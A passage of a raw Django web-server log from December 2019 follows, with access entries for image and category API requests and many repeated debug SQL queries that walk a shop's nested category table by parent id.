/media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 11:23:22] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 11:26:47,799 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:26:47,805 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:26:47,809 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:26:47,811 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:26:47,815 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:26:47,817 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:26:47,819 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:26:47,821 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:26:47,824 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:26:47,827 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:26:47,831 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:26:47,835 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:26:47,838 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:26:47,841 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:26:47,845 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:26:47,848 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:26:47,852 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:26:47,855 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:26:47,858 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:26:47,862 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:26:47,864 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:26:47,868 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:26:47,871 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:26:47,875 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:26:47,877 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:26:47,881 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:26:47,884 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:26:47,888 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:26:47,891 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:26:47,893 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:26:47,896 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:26:47,899 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:26:47,901 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:26:47,903 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:26:47,907 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:26:47,912 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:26:47,915 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:26:47,917 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:26:47,920 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:26:47,923 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:26:47,927 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:26:47,932 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:26:47,934 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:26:47,938 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:26:47,943 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:26:47,945 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:26:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 11:27:39,292 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:27:39,299 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:27:39,303 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:27:39,305 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:27:39,308 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:27:39,310 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:27:39,313 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:27:39,315 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:27:39,317 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:27:39,321 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:27:39,323 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:27:39,325 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:27:39,327 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:27:39,330 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:27:39,333 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:27:39,335 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:27:39,337 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:27:39,339 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:27:39,341 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:27:39,345 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:27:39,347 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:27:39,349 utils 4252 140031482124032 (0.000) SELECT 